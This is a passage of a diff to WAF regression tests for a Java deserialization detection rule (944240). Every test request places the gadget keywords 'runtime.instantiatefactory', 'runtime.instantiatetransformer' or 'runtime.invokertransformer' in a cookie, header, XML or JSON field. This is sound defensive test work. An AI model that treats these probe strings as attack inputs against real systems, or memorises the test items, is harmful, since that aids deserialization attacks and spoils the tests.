output: + log: + expect_ids: [944240] + - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - 
test_id: 32
 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"runtime.instantiatefactory\"}"
- output:
- log_contains: "id \"944240\""
- - test_title: 944240-33
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"runtime.instantiatefactory\"}"
+ output:
+ log:
+ expect_ids: [944240]
+ - test_id: 33
 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"runtime.instantiatefactory\": \"test\"}"
- output:
- log_contains: "id \"944240\""
- - test_title: 944240-34
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 39 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: - - 
stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "element_value"
- output:
- log_contains: "id \"944240\""
- - test_title: 944240-40
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944240]
+ - test_id: 40
 desc: "XML element value includes keyword runtime.instantiatetransformer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "runtime.instantiatetransformer"
- output:
- log_contains: "id \"944240\""
- - test_title: 944240-41
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatetransformer"
+ output:
+ log:
+ expect_ids: [944240]
+ 
- test_id: 41
 desc: "Nested XML element value includes keyword runtime.instantiatetransformer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "runtime.instantiatetransformer"
- output:
- log_contains: "id \"944240\""
- - test_title: 944240-42
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "runtime.instantiatetransformer"
+ output:
+ log:
+ expect_ids: [944240]
+ - test_id: 42
 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=runtime.instantiatetransformer"
- output:
- log_contains: "id \"944240\""
- - test_title: 944240-43
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: 
"text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=value" + output: + log: + expect_ids: [944240] + - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 